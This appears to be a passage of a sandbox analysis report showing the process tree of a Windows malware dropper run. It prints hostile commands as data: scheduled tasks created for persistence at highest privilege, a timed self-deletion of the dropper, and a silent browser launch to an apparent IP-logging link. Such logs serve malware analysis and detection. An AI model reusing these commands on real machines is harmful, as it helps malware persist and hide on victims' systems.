- - C:\Users\Admin\Documents\W3SGPRNzsnviCFwyWGjWU3KW.exe
    C:\Users\Admin\Documents\W3SGPRNzsnviCFwyWGjWU3KW.exe
    3⤵
    PID:14320
- - C:\Users\Admin\Documents\W3SGPRNzsnviCFwyWGjWU3KW.exe
    C:\Users\Admin\Documents\W3SGPRNzsnviCFwyWGjWU3KW.exe
    3⤵
    PID:13908
- - C:\Users\Admin\Documents\W3SGPRNzsnviCFwyWGjWU3KW.exe
    C:\Users\Admin\Documents\W3SGPRNzsnviCFwyWGjWU3KW.exe
    3⤵
    PID:1180
- - C:\Users\Admin\Documents\W3SGPRNzsnviCFwyWGjWU3KW.exe
    C:\Users\Admin\Documents\W3SGPRNzsnviCFwyWGjWU3KW.exe
    3⤵
    PID:14056
- - C:\Users\Admin\Documents\W3SGPRNzsnviCFwyWGjWU3KW.exe
    C:\Users\Admin\Documents\W3SGPRNzsnviCFwyWGjWU3KW.exe
    3⤵
    PID:10216
- - C:\Users\Admin\Documents\W3SGPRNzsnviCFwyWGjWU3KW.exe
    C:\Users\Admin\Documents\W3SGPRNzsnviCFwyWGjWU3KW.exe
    3⤵
    PID:14288
- - C:\Users\Admin\Documents\W3SGPRNzsnviCFwyWGjWU3KW.exe
    C:\Users\Admin\Documents\W3SGPRNzsnviCFwyWGjWU3KW.exe
    3⤵
    PID:12440
- - C:\Users\Admin\Documents\W3SGPRNzsnviCFwyWGjWU3KW.exe
    C:\Users\Admin\Documents\W3SGPRNzsnviCFwyWGjWU3KW.exe
    3⤵
    PID:12596
- - C:\Users\Admin\Documents\W3SGPRNzsnviCFwyWGjWU3KW.exe
    C:\Users\Admin\Documents\W3SGPRNzsnviCFwyWGjWU3KW.exe
    3⤵
    PID:14044
- - C:\Users\Admin\Documents\W3SGPRNzsnviCFwyWGjWU3KW.exe
    C:\Users\Admin\Documents\W3SGPRNzsnviCFwyWGjWU3KW.exe
    3⤵
    PID:8328
- - C:\Users\Admin\Documents\W3SGPRNzsnviCFwyWGjWU3KW.exe
    C:\Users\Admin\Documents\W3SGPRNzsnviCFwyWGjWU3KW.exe
    3⤵
    PID:12432
- - C:\Users\Admin\Documents\W3SGPRNzsnviCFwyWGjWU3KW.exe
    C:\Users\Admin\Documents\W3SGPRNzsnviCFwyWGjWU3KW.exe
    3⤵
    PID:14272
- - C:\Users\Admin\Documents\W3SGPRNzsnviCFwyWGjWU3KW.exe
    C:\Users\Admin\Documents\W3SGPRNzsnviCFwyWGjWU3KW.exe
    3⤵
    PID:1292
- - C:\Users\Admin\Documents\W3SGPRNzsnviCFwyWGjWU3KW.exe
    C:\Users\Admin\Documents\W3SGPRNzsnviCFwyWGjWU3KW.exe
    3⤵
    PID:12436
- - C:\Users\Admin\Documents\W3SGPRNzsnviCFwyWGjWU3KW.exe
    C:\Users\Admin\Documents\W3SGPRNzsnviCFwyWGjWU3KW.exe
    3⤵
    PID:4664
- - C:\Users\Admin\Documents\W3SGPRNzsnviCFwyWGjWU3KW.exe
    C:\Users\Admin\Documents\W3SGPRNzsnviCFwyWGjWU3KW.exe
    3⤵
    PID:10964
- - C:\Users\Admin\Documents\W3SGPRNzsnviCFwyWGjWU3KW.exe
    C:\Users\Admin\Documents\W3SGPRNzsnviCFwyWGjWU3KW.exe
    3⤵
    PID:9844
- - C:\Users\Admin\Documents\W3SGPRNzsnviCFwyWGjWU3KW.exe
    C:\Users\Admin\Documents\W3SGPRNzsnviCFwyWGjWU3KW.exe
    3⤵
    PID:12088
- - C:\Users\Admin\Documents\W3SGPRNzsnviCFwyWGjWU3KW.exe
    C:\Users\Admin\Documents\W3SGPRNzsnviCFwyWGjWU3KW.exe
    3⤵
    PID:12776
- - C:\Users\Admin\Documents\W3SGPRNzsnviCFwyWGjWU3KW.exe
    C:\Users\Admin\Documents\W3SGPRNzsnviCFwyWGjWU3KW.exe
    3⤵
    PID:8036
- - C:\Users\Admin\Documents\W3SGPRNzsnviCFwyWGjWU3KW.exe
    C:\Users\Admin\Documents\W3SGPRNzsnviCFwyWGjWU3KW.exe
    3⤵
    PID:7668
- - C:\Users\Admin\Documents\W3SGPRNzsnviCFwyWGjWU3KW.exe
    C:\Users\Admin\Documents\W3SGPRNzsnviCFwyWGjWU3KW.exe
    3⤵
    PID:10784
- - C:\Users\Admin\Documents\W3SGPRNzsnviCFwyWGjWU3KW.exe
    C:\Users\Admin\Documents\W3SGPRNzsnviCFwyWGjWU3KW.exe
    3⤵
    PID:12048
- - C:\Users\Admin\Documents\W3SGPRNzsnviCFwyWGjWU3KW.exe
    C:\Users\Admin\Documents\W3SGPRNzsnviCFwyWGjWU3KW.exe
    3⤵
    PID:11816
- - C:\Users\Admin\Documents\W3SGPRNzsnviCFwyWGjWU3KW.exe
    C:\Users\Admin\Documents\W3SGPRNzsnviCFwyWGjWU3KW.exe
    3⤵
    PID:12724
- - C:\Users\Admin\Documents\W3SGPRNzsnviCFwyWGjWU3KW.exe
    C:\Users\Admin\Documents\W3SGPRNzsnviCFwyWGjWU3KW.exe
    3⤵
    PID:1492
- - C:\Users\Admin\Documents\W3SGPRNzsnviCFwyWGjWU3KW.exe
    C:\Users\Admin\Documents\W3SGPRNzsnviCFwyWGjWU3KW.exe
    3⤵
    PID:5776
- - C:\Users\Admin\Documents\W3SGPRNzsnviCFwyWGjWU3KW.exe
    C:\Users\Admin\Documents\W3SGPRNzsnviCFwyWGjWU3KW.exe
    3⤵
    PID:14372
- - C:\Users\Admin\Documents\W3SGPRNzsnviCFwyWGjWU3KW.exe
    C:\Users\Admin\Documents\W3SGPRNzsnviCFwyWGjWU3KW.exe
    3⤵
    PID:15044
- - C:\Users\Admin\Documents\W3SGPRNzsnviCFwyWGjWU3KW.exe
    C:\Users\Admin\Documents\W3SGPRNzsnviCFwyWGjWU3KW.exe
    3⤵
    PID:13576
- - C:\Users\Admin\Documents\W3SGPRNzsnviCFwyWGjWU3KW.exe
    C:\Users\Admin\Documents\W3SGPRNzsnviCFwyWGjWU3KW.exe
    3⤵
    PID:15308
- - C:\Users\Admin\Documents\W3SGPRNzsnviCFwyWGjWU3KW.exe
    C:\Users\Admin\Documents\W3SGPRNzsnviCFwyWGjWU3KW.exe
    3⤵
    PID:13364
- - C:\Users\Admin\Documents\W3SGPRNzsnviCFwyWGjWU3KW.exe
    C:\Users\Admin\Documents\W3SGPRNzsnviCFwyWGjWU3KW.exe
    3⤵
    PID:14800
- - C:\Users\Admin\Documents\W3SGPRNzsnviCFwyWGjWU3KW.exe
    C:\Users\Admin\Documents\W3SGPRNzsnviCFwyWGjWU3KW.exe
    3⤵
    PID:12804
- - C:\Users\Admin\Documents\W3SGPRNzsnviCFwyWGjWU3KW.exe
    C:\Users\Admin\Documents\W3SGPRNzsnviCFwyWGjWU3KW.exe
    3⤵
    PID:14548
- C:\Users\Admin\Documents\O0GjO4BxRBaQwuHKn8sPaAFp.exe
  "C:\Users\Admin\Documents\O0GjO4BxRBaQwuHKn8sPaAFp.exe"
  2⤵
  - Executes dropped EXE
  - Checks whether UAC is enabled
  - Suspicious use of NtSetInformationThreadHideFromDebugger
  PID:1412
- C:\Users\Admin\Documents\YNB1ySiHyFM9Z1eqrhee6Ulg.exe
  "C:\Users\Admin\Documents\YNB1ySiHyFM9Z1eqrhee6Ulg.exe"
  2⤵
  - Executes dropped EXE
  PID:1428
- C:\Users\Admin\Documents\TamxLXMKExCKD_Z9p9V0UrUs.exe
  "C:\Users\Admin\Documents\TamxLXMKExCKD_Z9p9V0UrUs.exe"
  2⤵
  - Executes dropped EXE
  PID:1344
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 1344 -s 276
    3⤵
    - Drops file in Windows directory
    - Program crash
    - Checks processor information in registry
    - Enumerates system info in registry
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2468
- C:\Users\Admin\Documents\ed5TJd6VV6OEfHKZtdS0STNO.exe
  "C:\Users\Admin\Documents\ed5TJd6VV6OEfHKZtdS0STNO.exe"
  2⤵
  - Executes dropped EXE
  - Drops file in Program Files directory
  PID:2500
- - C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe
    "C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe"
    3⤵
    - Executes dropped EXE
    - Checks whether UAC is enabled
    PID:5040
- - C:\Program Files (x86)\Company\NewProduct\cutm3.exe
    "C:\Program Files (x86)\Company\NewProduct\cutm3.exe"
    3⤵
    - Executes dropped EXE
    PID:4872
- - C:\Program Files (x86)\Company\NewProduct\inst001.exe
    "C:\Program Files (x86)\Company\NewProduct\inst001.exe"
    3⤵
    - Executes dropped EXE
    PID:3996
- C:\Users\Admin\Documents\ikQKjhB4k6HEzP8ctwvkUexr.exe
  "C:\Users\Admin\Documents\ikQKjhB4k6HEzP8ctwvkUexr.exe"
  2⤵
  PID:2624

C:\Windows\System32\sihclient.exe
C:\Windows\System32\sihclient.exe /cv pVzHgpXms02TJxnTGiup5w.0.2
1⤵
- Modifies data under HKEY_USERS
PID:4912

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 512 -p 1344 -ip 1344
1⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:3512

C:\Users\Admin\AppData\Local\Temp\is-P9GTJ.tmp\ikQKjhB4k6HEzP8ctwvkUexr.tmp
"C:\Users\Admin\AppData\Local\Temp\is-P9GTJ.tmp\ikQKjhB4k6HEzP8ctwvkUexr.tmp" /SL5="$102C0,138429,56832,C:\Users\Admin\Documents\ikQKjhB4k6HEzP8ctwvkUexr.exe"
1⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of FindShellTrayWindow
PID:5108
- C:\Users\Admin\AppData\Local\Temp\is-68F1F.tmp\Setup.exe
  "C:\Users\Admin\AppData\Local\Temp\is-68F1F.tmp\Setup.exe" /Verysilent
  2⤵
  - Executes dropped EXE
  - Drops file in Program Files directory
  PID:1540
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://iplis.ru/1S2Qs7
    3⤵
    - Adds Run key to start application
    - Enumerates system info in registry
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of FindShellTrayWindow
    PID:5764
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xec,0x10c,0x7ffc98b546f8,0x7ffc98b54708,0x7ffc98b54718
      4⤵
      PID:2192
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2136,14292859908886072365,2166066135718510322,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2160 /prefetch:2
      4⤵
      PID:5428
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2136,14292859908886072365,2166066135718510322,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2212 /prefetch:3
      4⤵
      Suspicious behavior: EnumeratesProcesses
      PID:6760
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2136,14292859908886072365,2166066135718510322,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2632 /prefetch:8
      4⤵
      PID:2988
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2136,14292859908886072365,2166066135718510322,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3312 /prefetch:1
      4⤵
      PID:7024
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2136,14292859908886072365,2166066135718510322,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3320 /prefetch:1
      4⤵
      PID:6648
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2136,14292859908886072365,2166066135718510322,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3160 /prefetch:1
      4⤵
      PID:7284
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2136,14292859908886072365,2166066135718510322,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4324 /prefetch:1
      4⤵
      PID:3000
  - - C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\identity_helper.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2136,14292859908886072365,2166066135718510322,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5544 /prefetch:8
      4⤵
      PID:8412
  - - C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\identity_helper.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2136,14292859908886072365,2166066135718510322,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5544 /prefetch:8
      4⤵
      Suspicious behavior: EnumeratesProcesses
      PID:3668
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2136,14292859908886072365,2166066135718510322,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=5140 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.22000.1 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=5404 /prefetch:2
      4⤵
      PID:6596
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2136,14292859908886072365,2166066135718510322,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5368 /prefetch:1
      4⤵
      PID:3980
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2136,14292859908886072365,2166066135718510322,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3420 /prefetch:1
      4⤵
      PID:6344
- - C:\Program Files (x86)\SmartPDF\SmartPDF\9840432e051a6fa1192594db02b80a4c1fd73456.exe
    "C:\Program Files (x86)\SmartPDF\SmartPDF\9840432e051a6fa1192594db02b80a4c1fd73456.exe"
    3⤵
    PID:5472
  - - C:\Windows\SysWOW64\cmd.exe
      cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Program Files (x86)\SmartPDF\SmartPDF\9840432e051a6fa1192594db02b80a4c1fd73456.exe"
      4⤵
      PID:7512
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /T 10 /NOBREAK
        5⤵
        Delays execution with timeout.exe
        
        PID:1188
- - C:\Program Files (x86)\SmartPDF\SmartPDF\stats.exe
    "C:\Program Files (x86)\SmartPDF\SmartPDF\stats.exe" /Verysilent
    3⤵
    PID:2948
  - - C:\Users\Admin\AppData\Local\Temp\is-39D0B.tmp\stats.tmp
      "C:\Users\Admin\AppData\Local\Temp\is-39D0B.tmp\stats.tmp" /SL5="$3033E,138429,56832,C:\Program Files (x86)\SmartPDF\SmartPDF\stats.exe" /Verysilent
      4⤵
      Loads dropped DLL
      Suspicious use of FindShellTrayWindow
      PID:5476
    - - C:\Users\Admin\AppData\Local\Temp\is-LUKE1.tmp\Setup.exe
        
        "C:\Users\Admin\AppData\Local\Temp\is-LUKE1.tmp\Setup.exe" /Verysilent
        5⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:6908
      - C:\Users\Admin\Documents\c67evc6KY0PCYJEpvNSdAhUF.exe
        
        "C:\Users\Admin\Documents\c67evc6KY0PCYJEpvNSdAhUF.exe"
        6⤵
        
        PID:6052
      - C:\Users\Admin\Documents\bGTFsWbTZsPGZvWis4KO3GWU.exe
        
        "C:\Users\Admin\Documents\bGTFsWbTZsPGZvWis4KO3GWU.exe"
        6⤵
        Drops file in Program Files directory
        
        PID:6188
        
        C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl HR" /sc HOURLY /rl HIGHEST
        7⤵
        Creates scheduled task(s)
        
        PID:9288
        
        C:\Users\Admin\Documents\77cmUgJX0OQi4nZtiqUPG2Lo.exe
        
        "C:\Users\Admin\Documents\77cmUgJX0OQi4nZtiqUPG2Lo.exe"
        7⤵
        
        PID:6588
        
        C:\Users\Admin\Documents\0X6dwDv0mtrhEsynzOiH7AfL.exe
        
        "C:\Users\Admin\Documents\0X6dwDv0mtrhEsynzOiH7AfL.exe"
        8⤵
        
        PID:7564
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 7564 -s 232
        9⤵
        Program crash
        
        PID:5944
        
        C:\Users\Admin\Documents\4piv6ItaQcRTmIG90PsRWaQB.exe
        
        "C:\Users\Admin\Documents\4piv6ItaQcRTmIG90PsRWaQB.exe"
        8⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:5228
        
        C:\Users\Admin\AppData\Roaming\5385554.exe
        
        "C:\Users\Admin\AppData\Roaming\5385554.exe"
        9⤵
        
        PID:10340
        
        C:\Windows\system32\WerFault.exe
        
        C:\Windows\system32\WerFault.exe -u -p 10340 -s 2328
        10⤵
        Program crash
        
        PID:9276
        
        C:\Users\Admin\AppData\Roaming\3554097.exe
        
        "C:\Users\Admin\AppData\Roaming\3554097.exe"
        9⤵
        
        PID:10652
        
        C:\Users\Admin\AppData\Roaming\2498277.exe
        
        "C:\Users\Admin\AppData\Roaming\2498277.exe"
        9⤵
        
        PID:10772
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 10772 -s 2432
        10⤵
        Program crash
        
        PID:3732
        
        C:\Users\Admin\AppData\Roaming\3527681.exe
        
        "C:\Users\Admin\AppData\Roaming\3527681.exe"
        9⤵
        
        PID:10692
        
        C:\Users\Admin\AppData\Roaming\2271551.exe
        
        "C:\Users\Admin\AppData\Roaming\2271551.exe"
        9⤵
        
        PID:10436
        
        C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl LG" /sc ONLOGON /rl HIGHEST
        7⤵
        Checks processor information in registry
        Creates scheduled task(s)
        Enumerates system info in registry
        Suspicious behavior: EnumeratesProcesses
        
        PID:864
      - C:\Users\Admin\Documents\uyJC9XGWZurT9ImVlOeixBcS.exe
        
        "C:\Users\Admin\Documents\uyJC9XGWZurT9ImVlOeixBcS.exe"
        6⤵
        
        PID:8316
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 8316 -s 280
        7⤵
        Program crash
        
        PID:2472
      - C:\Users\Admin\Documents\3eR74IoZtKseXbdqRICi_2jw.exe
        
        "C:\Users\Admin\Documents\3eR74IoZtKseXbdqRICi_2jw.exe"
        6⤵
        
        PID:8656
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 8656 -s 244
        7⤵
        Program crash
        
        PID:10172
      - C:\Users\Admin\Documents\LDeU69DcMR0AGn5BdddwQh75.exe
        
        "C:\Users\Admin\Documents\LDeU69DcMR0AGn5BdddwQh75.exe"
        6⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:8484
      - C:\Users\Admin\Documents\qSXlY8i3KwcYJEfW8ywqf8mg.exe
        
        "C:\Users\Admin\Documents\qSXlY8i3KwcYJEfW8ywqf8mg.exe"
        6⤵
        Checks BIOS information in registry
        Checks whether UAC is enabled
        Suspicious use of NtSetInformationThreadHideFromDebugger
        Suspicious use of AdjustPrivilegeToken
        
        PID:8476
      - C:\Users\Admin\Documents\oFzu66zd5QZsMydeqeCIjDAC.exe
        
        "C:\Users\Admin\Documents\oFzu66zd5QZsMydeqeCIjDAC.exe"
        6⤵
        
        PID:8468
      - C:\Users\Admin\Documents\Em1f1oEHnyQ0a8h1oyItIKta.exe
        
        "C:\Users\Admin\Documents\Em1f1oEHnyQ0a8h1oyItIKta.exe"
        6⤵
        
        PID:8448
        
        C:\Users\Admin\AppData\Roaming\6135883.exe
        
        "C:\Users\Admin\AppData\Roaming\6135883.exe"
        7⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:9500
        
        C:\Windows\system32\WerFault.exe
        
        C:\Windows\system32\WerFault.exe -u -p 9500 -s 2360
        8⤵
        Program crash
        
        PID:5324
        
        C:\Users\Admin\AppData\Roaming\5761493.exe
        
        "C:\Users\Admin\AppData\Roaming\5761493.exe"
        7⤵
        Suspicious behavior: SetClipboardViewer
        
        PID:9964
        
        C:\Users\Admin\AppData\Roaming\6573124.exe
        
        "C:\Users\Admin\AppData\Roaming\6573124.exe"
        7⤵
        
        PID:9468
        
        C:\Users\Admin\AppData\Roaming\4994809.exe
        
        "C:\Users\Admin\AppData\Roaming\4994809.exe"
        7⤵
        
        PID:10216
        
        C:\Users\Admin\AppData\Roaming\4890399.exe
        
        "C:\Users\Admin\AppData\Roaming\4890399.exe"
        7⤵
        
        PID:576
      - C:\Users\Admin\Documents\SwCHiM1k_kk0mykkYJb5onl3.exe
        
        "C:\Users\Admin\Documents\SwCHiM1k_kk0mykkYJb5onl3.exe"
        6⤵
        Suspicious use of SetThreadContext
        
        PID:8308
        
        C:\Users\Admin\Documents\SwCHiM1k_kk0mykkYJb5onl3.exe
        
        C:\Users\Admin\Documents\SwCHiM1k_kk0mykkYJb5onl3.exe
        7⤵
        
        PID:3852
        
        C:\Users\Admin\Documents\SwCHiM1k_kk0mykkYJb5onl3.exe
        
        C:\Users\Admin\Documents\SwCHiM1k_kk0mykkYJb5onl3.exe
        7⤵
        
        PID:8632
        
        C:\Users\Admin\Documents\SwCHiM1k_kk0mykkYJb5onl3.exe
        
        C:\Users\Admin\Documents\SwCHiM1k_kk0mykkYJb5onl3.exe
        7⤵
        
        PID:7060
        
        C:\Users\Admin\Documents\SwCHiM1k_kk0mykkYJb5onl3.exe
        
        C:\Users\Admin\Documents\SwCHiM1k_kk0mykkYJb5onl3.exe
        7⤵
        
        PID:9268
        
        C:\Users\Admin\Documents\SwCHiM1k_kk0mykkYJb5onl3.exe
        
        C:\Users\Admin\Documents\SwCHiM1k_kk0mykkYJb5onl3.exe
        7⤵
        
        PID:9596
        
        C:\Users\Admin\Documents\SwCHiM1k_kk0mykkYJb5onl3.exe
        
        C:\Users\Admin\Documents\SwCHiM1k_kk0mykkYJb5onl3.exe
        7⤵
        
        PID:9940
        
        C:\Users\Admin\Documents\SwCHiM1k_kk0mykkYJb5onl3.exe
        
        C:\Users\Admin\Documents\SwCHiM1k_kk0mykkYJb5onl3.exe
        7⤵
        
        PID:7448
        
        C:\Users\Admin\Documents\SwCHiM1k_kk0mykkYJb5onl3.exe
        
        C:\Users\Admin\Documents\SwCHiM1k_kk0mykkYJb5onl3.exe
        7⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:7260
        
        C:\Users\Admin\Documents\SwCHiM1k_kk0mykkYJb5onl3.exe
        
        C:\Users\Admin\Documents\SwCHiM1k_kk0mykkYJb5onl3.exe
        7⤵
        
        PID:1564
        
        C:\Users\Admin\Documents\SwCHiM1k_kk0mykkYJb5onl3.exe
        
        C:\Users\Admin\Documents\SwCHiM1k_kk0mykkYJb5onl3.exe
        7⤵
        
        PID:676
        
        C:\Users\Admin\Documents\SwCHiM1k_kk0mykkYJb5onl3.exe
        
        C:\Users\Admin\Documents\SwCHiM1k_kk0mykkYJb5onl3.exe
        7⤵
        
        PID:1212
        
        C:\Users\Admin\Documents\SwCHiM1k_kk0mykkYJb5onl3.exe
        
        C:\Users\Admin\Documents\SwCHiM1k_kk0mykkYJb5onl3.exe
        7⤵
        
        PID:7112
        
        C:\Users\Admin\Documents\SwCHiM1k_kk0mykkYJb5onl3.exe
        
        C:\Users\Admin\Documents\SwCHiM1k_kk0mykkYJb5onl3.exe
        7⤵
        
        PID:7824
        
        C:\Users\Admin\Documents\SwCHiM1k_kk0mykkYJb5onl3.exe
        
        C:\Users\Admin\Documents\SwCHiM1k_kk0mykkYJb5onl3.exe
        7⤵
        
        PID:8376
        
        C:\Users\Admin\Documents\SwCHiM1k_kk0mykkYJb5onl3.exe
        
        C:\Users\Admin\Documents\SwCHiM1k_kk0mykkYJb5onl3.exe
        7⤵
        
        PID:9300
        
        C:\Users\Admin\Documents\SwCHiM1k_kk0mykkYJb5onl3.exe
        
        C:\Users\Admin\Documents\SwCHiM1k_kk0mykkYJb5onl3.exe
        7⤵
        
        PID:9836
        
        C:\Users\Admin\Documents\SwCHiM1k_kk0mykkYJb5onl3.exe
        
        C:\Users\Admin\Documents\SwCHiM1k_kk0mykkYJb5onl3.exe
        7⤵
        
        PID:2188
        
        C:\Users\Admin\Documents\SwCHiM1k_kk0mykkYJb5onl3.exe
        
        C:\Users\Admin\Documents\SwCHiM1k_kk0mykkYJb5onl3.exe
        7⤵
        
        PID:6996
        
        C:\Users\Admin\Documents\SwCHiM1k_kk0mykkYJb5onl3.exe
        
        C:\Users\Admin\Documents\SwCHiM1k_kk0mykkYJb5onl3.exe
        7⤵
        
        PID:8768
        
        C:\Users\Admin\Documents\SwCHiM1k_kk0mykkYJb5onl3.exe
        
        C:\Users\Admin\Documents\SwCHiM1k_kk0mykkYJb5onl3.exe
        7⤵
        
        PID:11204
        
        C:\Users\Admin\Documents\SwCHiM1k_kk0mykkYJb5onl3.exe
        
        C:\Users\Admin\Documents\SwCHiM1k_kk0mykkYJb5onl3.exe
        7⤵
        
        PID:10296
        
        C:\Users\Admin\Documents\SwCHiM1k_kk0mykkYJb5onl3.exe
        
        C:\Users\Admin\Documents\SwCHiM1k_kk0mykkYJb5onl3.exe
        7⤵
        
        PID:6752
        
        C:\Users\Admin\Documents\SwCHiM1k_kk0mykkYJb5onl3.exe
        
        C:\Users\Admin\Documents\SwCHiM1k_kk0mykkYJb5onl3.exe
        7⤵
        
        PID:10696
        
        C:\Users\Admin\Documents\SwCHiM1k_kk0mykkYJb5onl3.exe
        
        C:\Users\Admin\Documents\SwCHiM1k_kk0mykkYJb5onl3.exe
        7⤵
        
        PID:10440
        
        C:\Users\Admin\Documents\SwCHiM1k_kk0mykkYJb5onl3.exe
        
        C:\Users\Admin\Documents\SwCHiM1k_kk0mykkYJb5onl3.exe
        7⤵
        
        PID:10292
        
